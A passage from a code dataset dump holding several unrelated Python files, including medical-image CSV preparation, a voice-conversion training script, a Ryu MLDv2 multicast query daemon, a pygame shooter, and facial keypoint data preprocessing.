name='discussion-comments'),\r\n]\r\n","sub_path":"discussion/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"413280752","text":"import os\nimport sys\nsys.path.append(os.path.abspath('..'))\nfrom libs.data_preprocess.my_data import write_images_labels_csv, write_csv_based_on_dir\nfrom libs.data_preprocess.my_data_patiend_id import split_dataset_by_pat_id\n\ntask_type = '3D_OCT_AMD'\n#zeiss ZEISS ,Topocon\ndict_mapping = {'M0': 0, 'M1': 1}\ndir_process = '/disk1/3D_OCT_AMD/2021_4_22/preprocess/128_128_128/'\n\ndata_version = 'v1'\n\ncsv_all = os.path.abspath(os.path.join(os.path.abspath('..'),\n 'datafiles', data_version, task_type + '.csv'))\nwrite_csv_based_on_dir(csv_all, dir_process, dict_mapping,\n match_type='partial', list_file_ext=['.npy', '.NPY'])\n\n\nfiles_train, labels_train, files_valid, labels_valid, files_test, labels_test = \\\n split_dataset_by_pat_id(csv_all,\n valid_ratio=0.15, test_ratio=0.15, random_state=111)\ncsv_train = os.path.abspath(os.path.join(os.path.abspath('..'),\n 'datafiles', data_version, task_type + '_train.csv'))\ncsv_valid = os.path.abspath(os.path.join(os.path.abspath('..'),\n 'datafiles', data_version, task_type + '_valid.csv'))\ncsv_test = os.path.abspath(os.path.join(os.path.abspath('..'),\n 'datafiles', data_version, task_type + '_test.csv'))\nwrite_images_labels_csv(files_train, labels_train,\n filename_csv=csv_train)\nwrite_images_labels_csv(files_valid, labels_valid,\n filename_csv=csv_valid)\nwrite_images_labels_csv(files_test, labels_test,\n filename_csv=csv_test)\n\nimport pandas as pd\nfor csv_file in [csv_train, csv_valid, csv_test]:\n df = pd.read_csv(csv_file)\n print(len(df))\n for label in [0, 1]:\n df1 = df[df['labels'] == label]\n print(str(label), len(df1))\n\n''' \n1045\n0 706\n1 339\n220\n0 144\n1 76\n212\n0 151\n1 61\n'''\n\n\n\nprint('OK')\n\n","sub_path":"data_process/my_gen_csv.py","file_name":"my_gen_csv.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"186658278","text":"import sys\nimport os\nimport argparse\nimport torch\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\nfrom utils.dataloader import AudioNpyNameLoader, VCTK_NAME_collate\n\nsys.path.append('logger')\nfrom logger import Logger\nfrom logger_utils import prepare_directories_and_logger\n\nsys.path.append('utils')\nfrom save_and_load import save_checkpoint, load_checkpoint\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-train_dir', '--train_dir', type=str, required = True,\n help = 'preprocessed npy files in train dir')\nparser.add_argument('-test_dir','--test_dir', type=str, required = False, default=None,\n help = 'preprocessed npy files of test dir')\nparser.add_argument('-m', '--model', type=str, required= True,\n help='model type in model dir')\nparser.add_argument('-n', '--n_embed', type=str,required= True,\n help='number of vectors in codebook')\nparser.add_argument('-ch', '--channel', type=str, required= True,\n help='channel number in VQVC+')\nparser.add_argument('-t', '--trainer', type=str, required= True,\n help = 'which trainer do you want? (rhythm, mean_std, normal)')\nparser.add_argument('--load_checkpoint', type=bool, default=False,\n required=False)\n\n\nargs = parser.parse_args()\nlogger = prepare_directories_and_logger(Logger, output_directory = f'output/{args.model}_n{args.n_embed}_ch{args.channel}_{args.trainer}')\n\nimport importlib\n\ntrainer = importlib.import_module(f'trainer.{args.trainer}')\ntrain_ = getattr(trainer, 'train_')\n\nmodel = importlib.import_module(f'model.{args.model}.vq_model')\nmodel = getattr(model, 'VC_MODEL')\n'''\nDataset and loader\n'''\ndef make_inf_iterator(data_iterator):\n while True:\n for data in data_iterator:\n yield data\n\naudio_dir = args.train_dir#\"/home/ericwudayi/nas189/homes/ericwudayi/VCTK-Corpus/mel3/mel.melgan\"\n\ndataset = AudioNpyNameLoader(audio_dir)\nloader = DataLoader(dataset, batch_size=16, shuffle=True, num_workers=8,collate_fn=VCTK_NAME_collate)\n\nif args.test_dir != None:\n audio_dir_test = args.test_dir#\"/home/ericwudayi/nas189/homes/ericwudayi/VCTK-Corpus/mel3/mel.test\"\nelse:\n audio_dir_test = audio_dir\n print (\"None test dir, use train dir instead\")\ndataset_test = AudioNpyNameLoader(audio_dir_test)\ntest_loader = DataLoader(dataset_test, batch_size=8, shuffle=True, num_workers=4,collate_fn=VCTK_NAME_collate)\ninf_iterator_test = make_inf_iterator(test_loader)\n'''\nModel Initilization\n'''\nmodel = model(in_channel=80,channel=int(args.channel),n_embed=int(args.n_embed)).cuda()\nopt = optim.Adam(model.parameters())\n'''\nTraining\n'''\ncriterion = nn.L1Loss()\nlatent_loss_weight = 0.1\niteration = 0\nif args.load_checkpoint==True:\n model, opt, iteration = load_checkpoint(f'checkpoint/{args.model}_n{args.n_embed}_ch{args.channel}_{args.trainer}/gen', model, opt) \n\n\ntrain_(args, model, opt, latent_loss_weight, criterion, loader, 800, inf_iterator_test, logger, iteration)","sub_path":"train_name.py","file_name":"train_name.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"20442864","text":"import csv\r\nimport re\r\n\r\n\r\n## inputFile = str(input(\"What is the input file?:\"))\r\n##saveFile = str(input(\"What do you want to name your output file?:\"))\r\n\r\n##user enter oil type as defined in Ample W/O \"Production\" column\r\n##Oil Black Widow\r\n##Oil Jesus OG\r\n##Oil Sativa Blend\r\n##etc....\r\ndef queryOilStrain():\r\n \"get input oil strain type\"\r\n lotType = str(input(\"What lot/strain type?:\"))\r\n\r\n return lotType\r\n\r\nresult={}\r\n\r\n#create a list of all WO Types\r\ndef getWOList(inputFile=\"workOrders\", lotType=\"Oil Black Widow\"):\r\n\r\n with open(inputFile+\".csv\", \"r\") as sourceFile:\r\n csv_reader = csv.reader(sourceFile, delimiter =\",\")\r\n woType = []\r\n for line in csv_reader:\r\n if line[5] == lotType and line[1] not in woType:\r\n woType.append(line[1])\r\n \r\n return woType\r\n\r\nresult[\"Work Orders Completed\"] = getWOList()\r\n \r\n##put all oil lots into a list\r\ndef getOilLotCodes(inputFile=\"workOrders\", lotType=\"Oil Black Widow\"):\r\n \"collect all lot numbers of a given oil production into a list\"\r\n \r\n with open(inputFile+\".csv\", \"r\") as sourceFile:\r\n csv_reader = csv.reader(sourceFile, delimiter=',')\r\n lotList = []\r\n for line in csv_reader:\r\n if line[5] == lotType and len(line[3])<8:\r\n \r\n ## find lot numbers of len 4\r\n m = re.match(r\"^\\d{4}(?!\\d)\", line[3])\r\n if m!= None:\r\n if m.group() not in lotList:\r\n lotList.append(m.group())\r\n ## find lot numbers of len 3 \r\n n = re.match(r\"^\\d{3}(?!/d)\", line[3])\r\n if n!= None:\r\n if n.group() not in lotList:\r\n lotList.append(n.group())\r\n lotList.sort() \r\n \r\n return lotList\r\n\r\nlotList = getOilLotCodes()\r\nprint(\"LOT LIST BELOW\")\r\nprint(lotList)\r\n\r\nresult[\"Lot List\"] = getOilLotCodes()\r\n\r\ndef getAllInputs(result = result, inputFile=\"workOrders\",):\r\n \"\"\r\n\r\n with open(inputFile+\".csv\", \"r\") as sourceFile:\r\n file = csv.reader(sourceFile, delimiter=',')\r\n\r\n for order in result[\"Work Orders Completed\"]:\r\n getInput(workOrderType = order)\r\n\r\n\r\n\r\n\r\n\r\n return None\r\n\r\n\r\ndef getInput(inputFile=\"workOrders\", lotList = lotList, workOrderType=\"Oil - Milling\"):\r\n \"given a list of lot numbers return a list of equal len/order of input mass in grams\"\r\n with open(inputFile+\".csv\", \"r\") as sourceFile:\r\n file = csv.reader(sourceFile, delimiter=',')\r\n \r\n inputList = []\r\n holdingVar = 0\r\n\r\n for line in file:\r\n for item in lotList:\r\n\r\n if len(item)==4:\r\n m = re.match(r\"^\\d{4}(?!\\d)\", line[3])\r\n if m:\r\n if line[3] == item and line[1]==workOrderType:\r\n inputList.append([line[3], line[6]])\r\n \r\n if len(item) ==3:\r\n n = re.match(r\"^\\d{3}(?!\\d)\", line[3])\r\n if n:\r\n \r\n if line[3] == item and line[1]==workOrderType:\r\n\r\n inputList.append([line[3], line[6]])\r\n \r\n result[workOrderType] = inputList\r\n \r\n return inputList\r\n\r\n \r\n \r\n\r\n \r\n\r\n \r\n\r\n","sub_path":"fileIO/listWork.py","file_name":"listWork.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"75341537","text":"cl_commands={\n \"/quit\": quit,\n \"/join\": quit\n }\n\nsv_commands={\n \"/quit\": quit\n }\n\ndef parse(data, sv=True):\n data=data.strip()\n\n if data.startswith(\"/\"):\n cmd=\"NULL\"\n args=\"\"\n\n splitdata=data.split(\" \", 1)\n\n if splitdata != []:\n cmd=splitdata[0]\n if len(splitdata) >= 2:\n args=splitdata[1]\n\n if sv:\n if cmd in sv_commands:\n return sv_commands[cmd](args)\n else:\n return \"No such server command %s\" % cmd\n else:\n if cmd in cl_commands:\n return cl_commands[cmd](args)\n else:\n return \"No such client command %s\" % cmd\n","sub_path":"src/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"29680451","text":"# coding: utf-8\n# zmq install\n# >sudo apt-get install libzmq-dev\n# >sudo apt-get install python-zmq\n\nfrom ryu.ofproto import ether, inet\nfrom ryu.lib.packet import ethernet, ipv6, icmpv6, vlan\nfrom ryu.lib import hub\nfrom scapy import sendrecv\nfrom scapy import packet as scapy_packet\nfrom eventlet import patcher\nfrom icmpv6_extend import icmpv6_extend\nimport os\nimport logging\nimport logging.config\nimport cPickle\nimport zmq\nhub.patch()\n\n\n# ======================================================================\n# mld_process\n# ======================================================================\nclass mld_process():\n\n # send interval(sec)\n WAIT_TIME = 20\n\n IPC = \"ipc://\"\n SEND_PATH = \"/tmp/feeds/mld-ryu\"\n RECV_PATH = \"/tmp/feeds/ryu-mld\"\n IPC_PATH_SEND = IPC + SEND_PATH\n IPC_PATH_RECV = IPC + RECV_PATH\n\n BASEPATH = os.path.dirname(os.path.abspath(__file__))\n MULTICAST_SERVICE_INFO = os.path.normpath(\n os.path.join(BASEPATH, \"./multicast_service_info.csv\"))\n ADDRESS_INFO = os.path.normpath(\n os.path.join(BASEPATH, \"./address_info.csv\"))\n addressinfo = []\n\n org_thread = patcher.original(\"threading\")\n org_thread_time = patcher.original(\"time\")\n\n def __init__(self):\n logging.config.fileConfig(\"../../logconf.ini\")\n self.logger = logging.getLogger(__name__)\n self.logger.debug(\"\")\n\n for line in open(self.ADDRESS_INFO, \"r\"):\n if line[0] == \"#\":\n continue\n else:\n columns = list(line[:-1].split(\",\"))\n for column in columns:\n self.addressinfo.append(column)\n\n self.logger.debug(\"addressinfo : %s\", str(self.addressinfo))\n\n # CHECK TMP FILE(SEND)\n self.check_exists_tmp(self.SEND_PATH)\n\n # CHECK TMP FILE(RECV)\n self.check_exists_tmp(self.RECV_PATH)\n \n ctx = zmq.Context()\n self.send_sock = ctx.socket(zmq.PUB)\n self.send_sock.bind(self.IPC_PATH_SEND)\n\n self.recv_sock = ctx.socket(zmq.SUB)\n self.recv_sock.connect(self.IPC_PATH_RECV)\n self.recv_sock.setsockopt(zmq.SUBSCRIBE, \"\")\n\n # ==================================================================\n # check_exists_tmp\n # ==================================================================\n def check_exists_tmp(self, filename):\n self.logger.debug(\"\")\n\n if os.path.exists(filename):\n return\n\n else:\n f = open(filename, \"w\")\n f.write(\"\")\n f.close()\n self.logger.info(\"create file [%s]\", filename)\n\n # ==================================================================\n # send_mldquey_regularly\n # ==================================================================\n def send_mldquey_regularly(self):\n self.logger.debug(\"\")\n mc_service_info_list = []\n for line in open(self.MULTICAST_SERVICE_INFO, \"r\"):\n if line[0] == \"#\":\n continue\n else:\n # multicast_addr, srcip_addr\n column = list(line[:-1].split(\",\"))\n mc_service_info_list.append(column)\n self.logger.debug(\n \"send address(multicast_addr, srcip_addr) : %s\",\n str(mc_service_info_list))\n\n while True:\n for mc_service_info in mc_service_info_list:\n ip_addr_list = []\n if not mc_service_info[1] == \"\":\n ip_addr_list.append(mc_service_info[1])\n mld = self.create_mldquery(\n mc_service_info[0], ip_addr_list)\n sendpkt = self.create_packet(self.addressinfo, mld)\n self.send_packet_to_sw(sendpkt)\n hub.sleep(self.WAIT_TIME)\n\n # ==================================================================\n # create_mldquery\n # ==================================================================\n def create_mldquery(self, mc_addr, ip_addr_list):\n self.logger.debug(\"\")\n return icmpv6.mldv2_query(address=mc_addr, srcs=ip_addr_list,\n maxresp=10000, qqic=15)\n\n # ==================================================================\n # create_mldreport\n # ==================================================================\n def create_mldreport(self, mc_service_info):\n self.logger.debug(\"\")\n\n src_list = []\n src_list.append(mc_service_info[1])\n\n record_list = []\n record_list.append(icmpv6.mldv2_report_group(\n type_=icmpv6.MODE_IS_INCLUDE,\n num=1,\n address=mc_service_info[0],\n srcs=src_list))\n\n return icmpv6.mldv2_report(records=record_list)\n\n # ==================================================================\n # create_packet\n # ==================================================================\n def create_packet(self, addressinfo, mld):\n self.logger.debug(\"\")\n\n # ETHER\n eth = ethernet.ethernet(\n# ethertype=ether.ETH_TYPE_8021Q\n ethertype=ether.ETH_TYPE_IPV6, \n src=addressinfo[0], dst=addressinfo[1])\n\n# TODO\n \"\"\"\n # VLAN\n vln = vlan.vlan(vid=100, ethertype=ether.ETH_TYPE_IPV6)\n \"\"\"\n # IPV6 with Hop-By-Hop\n ext_headers = [ipv6.hop_opts(nxt=inet.IPPROTO_ICMPV6,\n data=[ipv6.option(type_=5, len_=2, data=\"\\x00\\x00\"),\n ipv6.option(type_=1, len_=0)])]\n ip6 = ipv6.ipv6(src=addressinfo[2], dst=addressinfo[3],\n hop_limit=1, nxt=inet.IPPROTO_HOPOPTS,\n ext_hdrs=ext_headers)\n\n # MLDV2\n if type(mld) == icmpv6.mldv2_query:\n icmp6 = icmpv6_extend(\n type_=icmpv6.MLD_LISTENER_QUERY, data=mld)\n\n elif type(mld) == icmpv6.mldv2_report:\n icmp6 = icmpv6_extend(\n type_=icmpv6.MLDV2_LISTENER_REPORT, data=mld)\n\n # ether - vlan - ipv6 - icmpv6 ( - mldv2 )\n# sendpkt = eth / vln / ip6 / icmp6\n sendpkt = eth / ip6 / icmp6\n sendpkt.serialize()\n self.logger.debug(\"created packet(ryu) : %s\", str(sendpkt))\n\n return sendpkt\n\n # ==================================================================\n # send_packet_to_sw\n # ==================================================================\n def send_packet_to_sw(self, ryu_packet):\n self.logger.debug(\"\")\n sendpkt = scapy_packet.Packet(ryu_packet.data)\n\n # send of scapy\n sendrecv.sendp(sendpkt)\n self.logger.info(\"sent 1 packet to switch.\")\n\n # ==================================================================\n # send_packet_to_ryu\n # ==================================================================\n def send_packet_to_ryu(self, ryu_packet):\n self.logger.debug(\"\")\n\n # send of zeromq\n self.send_sock.send(cPickle.dumps(ryu_packet, protocol=0))\n self.logger.info(\"sent 1 packet to ryu. = \" + str(ryu_packet))\n\n # ==================================================================\n # distribute_receive_packet\n # ==================================================================\n def distribute_receive_packet(self, packet):\n self.logger.debug(\"\")\n self.logger.debug(\"###packet=\" + str(packet))\n pkt_eth = packet.get_protocols(ethernet.ethernet)\n pkt_ipv6 = packet.get_protocols(ipv6.ipv6)\n pkt_icmpv6_list = packet.get_protocols(icmpv6.icmpv6)\n self.logger.debug(\"pkt_eth\" + str(pkt_eth))\n self.logger.debug(\"pkt_ipv6\" + str(pkt_ipv6))\n self.logger.debug(\"pkt_icmpv6_list\" + str(pkt_icmpv6_list))\n\n for pkt_icmpv6 in pkt_icmpv6_list:\n # MLDv2 Query\n if pkt_icmpv6.type_ == icmpv6.MLD_LISTENER_QUERY:\n self.logger.debug(\"MLDv2 Query : %s\",\n str(pkt_icmpv6.data))\n self.send_reply()\n\n # MLDv2 Report\n if pkt_icmpv6.type_ == icmpv6.MLDV2_LISTENER_REPORT:\n self.logger.debug(\"MLDv2 Report : %s\",\n str(pkt_icmpv6.data))\n self.send_multicast_info(pkt_icmpv6)\n\n # ==================================================================\n # send_reply\n # ==================================================================\n def send_reply(self):\n self.logger.debug(\"\")\n \n mc_info_list = self.load_multicast_info()\n for mc_info in mc_info_list:\n mld = self.create_mldreport(mc_info)\n sendpkt = self.create_packet(self.addressinfo, mld)\n self.send_packet_to_ryu(sendpkt)\n\n # ==================================================================\n # load_multicast_info\n # ==================================================================\n def load_multicast_info(self):\n self.logger.debug(\"\")\n# TODO p-inしたReportから保持した情報を返却する\n# (暫定でファイルからの読み込み)\n mc_service_info_list = []\n for line in open(self.MULTICAST_SERVICE_INFO, \"r\"):\n if line[0] == \"#\":\n continue\n else:\n # mc_addr, ip_addr\n column = list(line[:-1].split(\",\"))\n mc_service_info_list.append(column)\n return mc_service_info_list\n\n # ==================================================================\n # send_multicast_info\n # ==================================================================\n def send_multicast_info(self, pkt):\n self.logger.debug(\"\")\n self.regist_multicast_info(pkt)\n# TODO p-outの情報を設定したReportを生成する\n# sendpkt = self.create_mldreport((\"\", \"\"))\n# self.send_packet_to_ryu(sendpkt)\n\n # ==================================================================\n # regist_multicast_info\n # ==================================================================\n def regist_multicast_info(self, pkt):\n self.logger.debug(\"\")\n# TODO p-inしたReportの情報をメモリ上に保持する\n\n # ==================================================================\n # receive_from_ryu\n # ==================================================================\n def receive_from_ryu(self):\n self.logger.debug(\"\")\n while True:\n # receive of zeromq\n recvpkt = self.recv_sock.recv()\n packet = cPickle.loads(recvpkt)\n self.logger.debug(\"packet : %s\", str(packet))\n self.distribute_receive_packet(packet)\n\n self.org_thread_time.sleep(1)\n\nif __name__ == \"__main__\":\n mld_proc = mld_process()\n hub.spawn(mld_proc.send_mldquey_regularly)\n recv_thre = mld_proc.org_thread.Thread(\n target=mld_proc.receive_from_ryu,\n name=\"ReceiveThread\")\n recv_thre.start()\n while True:\n hub.sleep(1)\n","sub_path":"mld/app/mld_process.py","file_name":"mld_process.py","file_ext":"py","file_size_in_byte":11101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"407009416","text":"#-*-Encoding:utf-8-*-\nimport pygame\nfrom pygame.locals import *\nfrom sys import exit\n\npygame.init()\nscreen = pygame.display.set_mode((480, 700)) #设置窗口宽度和高度\npygame.display.set_caption('飞机大战') #设置窗口标题\n\nplane_img = pygame.image.load('resources/image/shoot.png') #设置资源图片\nbackground = pygame.image.load('resources/image/round1.jpg').convert() #设置背景图片\n\nplayer = plane_img.subsurface(pygame.Rect(0, 99, 102, 126)) #玩家图片\nplayer_pos = [100, 200]\nenemy1 = plane_img.subsurface(pygame.Rect(534, 612, 57, 43)) #敌机图片\nenemy2 = plane_img.subsurface(pygame.Rect(534, 612, 57, 43))\nenemy3 = plane_img.subsurface(pygame.Rect(534, 612, 57, 43))\nenemy1_pos = [200, 0]\nenemy2_pos = [300, 100]\nenemy3_pos = [260, 400]\nclock = pygame.time.Clock()\n\nwhile True:\n clock.tick(60) #设置帧率\n screen.fill(0)\n screen.blit(background, (0, 0)) #把背景图贴到游戏窗口上\n screen.blit(player, player_pos) #把玩家图片贴到游戏窗口上\n screen.blit(enemy1, enemy1_pos) #把敌机图片贴到游戏窗口上\n screen.blit(enemy2, enemy2_pos)\n screen.blit(enemy3, enemy3_pos)\n enemy1_pos[1] += 1\n enemy2_pos[1] += 1\n enemy3_pos[1] += 2\n\n key_pressed = pygame.key.get_pressed()\n if key_pressed[K_w] or key_pressed[K_UP]:\n player_pos[1] -= 2\n if key_pressed[K_s] or key_pressed[K_DOWN]:\n player_pos[1] += 2\n if key_pressed[K_a] or key_pressed[K_LEFT]:\n player_pos[0] -= 2\n if key_pressed[K_d] or key_pressed[K_RIGHT]:\n player_pos[0] += 2\n\n for event in pygame.event.get():\n if event.type == QUIT: #定义关闭游戏窗口的事件\n pygame.quit()\n exit()\n pygame.display.update() #更新整个窗口的内容\n","sub_path":"test/v04.py","file_name":"v04.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"472234457","text":"def sumPair(arr, key):\n s = set()\n for i in range(0, len(arr)):\n temp = key - arr[i]\n if (temp in s):\n return (temp, arr[i])\n s.add(arr[i])\n\ninpArr = [int(ele) for ele in input('Enter the array element: ').split()]\nkey = int(input('Enter the key value: '))\nprint(f'The pair that evaluates to {key} is {sumPair(inpArr, key)}')\n","sub_path":"Day 25 - Two Sum.py","file_name":"Day 25 - Two Sum.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"468388825","text":"import numpy as np\nimport pandas as pd\nfrom numpy import genfromtxt\nfrom numpy import ravel\nimport h5py\nfrom numpy import (array, dot, arccos)\nfrom numpy.linalg import norm\n\nnr=3000\n\ndf = pd.read_csv('training.csv',header=0)\ndfp = pd.read_csv('test.csv',header=0)\n\ndef dist(x,y): \n return np.sqrt(np.sum((x-y)**2))\n\ndef image_histogram_equalization(image, number_bins=256):\n # from http://www.janeriksolem.net/2009/06/histogram-equalization-with-python-and.html\n\n # get image histogram\n image_histogram, bins = np.histogram(image.flatten(), number_bins, normed=True)\n cdf = image_histogram.cumsum() # cumulative distribution function\n cdf = 255 * cdf / cdf[-1] # normalize\n\n # use linear interpolation of cdf to find new pixel values\n image_equalized = np.interp(image.flatten(), bins[:-1], cdf)\n\n return image_equalized.reshape(image.shape), cdf\n\ndef certainty(row, name):\n return 0.00 if np.isnan(row[name]) else 1.0\n\ny = df.drop(['Image'], axis=1)\n\nprint('#1')\nprint(y[nr:nr+1])\n\ndict_certainity = {c + '_certainty':y.apply (lambda row: certainty(row, c),axis=1) for c in y.columns}\ncertainty = pd.DataFrame(dict_certainity)\n\ny_imp = y.copy()\nfor c in y.columns:\n y_imp[c].fillna(y_imp[c].median(), inplace=True )\n\ny_imp = y_imp.values \ny_imp = y_imp.astype(np.float32) \ny = y_imp.reshape((-1,30))\n\nprint('#2')\nprint(y[nr:nr+1])\n\n\n\ncertainty = certainty.values\ncertainty = certainty.astype(np.float32) \ncertainty = certainty.reshape((-1,30))\n\ny = y / 96\n\nprint ('Y shape', y.shape)\n\n# Extracting Images\n\ndf['Image'] = df['Image'].apply(lambda im: np.fromstring(im, sep=' ') )\nX = np.vstack (df['Image'].values) \n\nX = X.reshape(-1,96,96)\n\n# Histogram equalization\nfor i in range(len(X)):\n X[i, :, :] = image_histogram_equalization(X[i, :,:])[0]\n\n\nX = X.astype(np.float32)\nX = X/255 \nX = X.reshape(-1,1,96,96)\n\n#print ('X:', X.shape)\n\nprint ('Shape', 'Labels', X.shape, y.shape)\n\n\ndfp['Image'] = dfp['Image'].apply(lambda im: np.fromstring(im, sep=' ') )\nXp = np.vstack (dfp['Image'].values) \n\nXp = Xp.reshape(-1,96,96)\nfor i in range(len(Xp)):\n Xp[i, :, :] = image_histogram_equalization(Xp[i,:,:])[0]\n\n\nXp = Xp.astype(np.float32)\nXp = Xp/255 \nXp = Xp.reshape(-1,1,96,96)\n\n#print ('X:', X.shape)\n\nprint ('Shape of predict', Xp.shape)\n\n\n\n#X_train, X_test, y_train, y_test = cross_validation.train_test_split(X,labels, test_size=0.30)\n\nX_test = X[:1600]\ny_test = y[:1600]\ncertainty_test = certainty[:1600] \n\nX_train = X[1600:]\ny_train = y[1600:]\ncertainty_train = certainty[1600:] \n\nprint ('Train, Test shapes (X,y):', X_train.shape, y_train.shape, X_test.shape, y_test.shape)\n\n# Train data\nf = h5py.File(\"facialkp-train.hd5\", \"w\")\nf.create_dataset(\"data\", data=X_train, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"label\", data=y_train, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"certainty\", data=certainty_train, compression=\"gzip\", compression_opts=4)\nf.close()\n\n#Test data\nf = h5py.File(\"facialkp-test.hd5\", \"w\")\nf.create_dataset(\"data\", data=X_test, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"label\", data=y_test, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"certainty\", data=certainty_test, compression=\"gzip\", compression_opts=4)\nf.close()\n\n# Full train data\nf = h5py.File(\"facialkp-full-train.hd5\", \"w\")\nf.create_dataset(\"data\", data=X, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"label\", data=y, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"certainty\", data=certainty, compression=\"gzip\", compression_opts=4)\nf.close()\n\n# Predict data\nf = h5py.File(\"facialkp-unlabeled.hd5\", \"w\")\nf.create_dataset(\"data\", data=Xp, compression=\"gzip\", compression_opts=4)\nf.close()\n\ndef flip_labels_lr(labels):\n (left_eye_center_x,left_eye_center_y, \\\n right_eye_center_x,right_eye_center_y, \\\n left_eye_inner_corner_x,left_eye_inner_corner_y, \\\n left_eye_outer_corner_x,left_eye_outer_corner_y, \\\n right_eye_inner_corner_x,right_eye_inner_corner_y, \\\n right_eye_outer_corner_x,right_eye_outer_corner_y, \\\n left_eyebrow_inner_end_x,left_eyebrow_inner_end_y, \\\n left_eyebrow_outer_end_x,left_eyebrow_outer_end_y, \\\n right_eyebrow_inner_end_x,right_eyebrow_inner_end_y, \\\n right_eyebrow_outer_end_x,right_eyebrow_outer_end_y, \\\n nose_tip_x,nose_tip_y, \\\n mouth_left_corner_x,mouth_left_corner_y, \\\n mouth_right_corner_x,mouth_right_corner_y, \\\n mouth_center_top_lip_x,mouth_center_top_lip_y, \\\n mouth_center_bottom_lip_x,mouth_center_bottom_lip_y) = labels\n\n left_eye_center_x_fl, left_eye_center_y_fl = (1.0 - right_eye_center_x), right_eye_center_y\n right_eye_center_x_fl,right_eye_center_y_fl = (1.0 - left_eye_center_x), left_eye_center_y\n left_eye_inner_corner_x_fl,left_eye_inner_corner_y_fl = (1.0 - right_eye_inner_corner_x),right_eye_inner_corner_y\n left_eye_outer_corner_x_fl,left_eye_outer_corner_y_fl = (1.0 - right_eye_outer_corner_x),right_eye_outer_corner_y\n right_eye_inner_corner_x_fl,right_eye_inner_corner_y_fl = (1.0 - left_eye_inner_corner_x),left_eye_inner_corner_y\n right_eye_outer_corner_x_fl,right_eye_outer_corner_y_fl = (1.0 - left_eye_outer_corner_x),left_eye_outer_corner_y\n left_eyebrow_inner_end_x_fl,left_eyebrow_inner_end_y_fl = (1.0 - right_eyebrow_inner_end_x),right_eyebrow_inner_end_y\n left_eyebrow_outer_end_x_fl,left_eyebrow_outer_end_y_fl = (1.0 - right_eyebrow_outer_end_x),right_eyebrow_outer_end_y\n right_eyebrow_inner_end_x_fl,right_eyebrow_inner_end_y_fl = (1.0 - left_eyebrow_inner_end_x),left_eyebrow_inner_end_y\n right_eyebrow_outer_end_x_fl,right_eyebrow_outer_end_y_fl = (1.0 - left_eyebrow_outer_end_x),left_eyebrow_outer_end_y\n nose_tip_x_fl,nose_tip_y_fl = (1.0 - nose_tip_x),nose_tip_y\n mouth_left_corner_x_fl,mouth_left_corner_y_fl = (1.0 - mouth_right_corner_x),mouth_right_corner_y\n mouth_right_corner_x_fl,mouth_right_corner_y_fl = (1.0 - mouth_left_corner_x),mouth_left_corner_y\n mouth_center_top_lip_x_fl,mouth_center_top_lip_y_fl = (1.0 - mouth_center_top_lip_x),mouth_center_top_lip_y\n mouth_center_bottom_lip_x_fl,mouth_center_bottom_lip_y_fl = (1.0 - mouth_center_bottom_lip_x),mouth_center_bottom_lip_y\n\n return np.array([left_eye_center_x_fl,left_eye_center_y_fl, \\\n right_eye_center_x_fl,right_eye_center_y_fl, \\\n left_eye_inner_corner_x_fl,left_eye_inner_corner_y_fl, \\\n left_eye_outer_corner_x_fl,left_eye_outer_corner_y_fl, \\\n right_eye_inner_corner_x_fl,right_eye_inner_corner_y_fl, \\\n right_eye_outer_corner_x_fl,right_eye_outer_corner_y_fl, \\\n left_eyebrow_inner_end_x_fl,left_eyebrow_inner_end_y_fl, \\\n left_eyebrow_outer_end_x_fl,left_eyebrow_outer_end_y_fl, \\\n right_eyebrow_inner_end_x_fl,right_eyebrow_inner_end_y_fl, \\\n right_eyebrow_outer_end_x_fl,right_eyebrow_outer_end_y_fl, \\\n nose_tip_x_fl,nose_tip_y_fl, \\\n mouth_left_corner_x_fl,mouth_left_corner_y_fl, \\\n mouth_right_corner_x_fl,mouth_right_corner_y_fl, \\\n mouth_center_top_lip_x_fl,mouth_center_top_lip_y_fl, \\\n mouth_center_bottom_lip_x_fl,mouth_center_bottom_lip_y_fl])\n\nXflipped = X.copy()\nYflipped = y.copy()\ncertainty_flipped = certainty.copy()\nfor i in range(X.shape[0]):\n Xflipped[i,0,:,:] = np.fliplr(Xflipped[i,0,:,:])\n Yflipped[i,:] = flip_labels_lr(Yflipped[i,:])\n certainty_flipped[i,:] = flip_labels_lr(certainty_flipped[i,:])\n\nf = h5py.File(\"facialkp-flipped-train.hd5\", \"w\")\nf.create_dataset(\"data\", data=Xflipped, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"label\", data=Yflipped, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"certainty\", data=certainty_flipped, compression=\"gzip\", compression_opts=4)\nf.close()\n\nXextended = np.vstack((X,Xflipped))\nYextended = np.vstack((y,Yflipped))\nCextended = np.vstack((certainty,certainty_flipped))\n\nf = h5py.File(\"facialkp-extended-train.hd5\", \"w\")\nf.create_dataset(\"data\", data=Xextended, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"label\", data=Yextended, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"certainty\", data=Cextended, compression=\"gzip\", 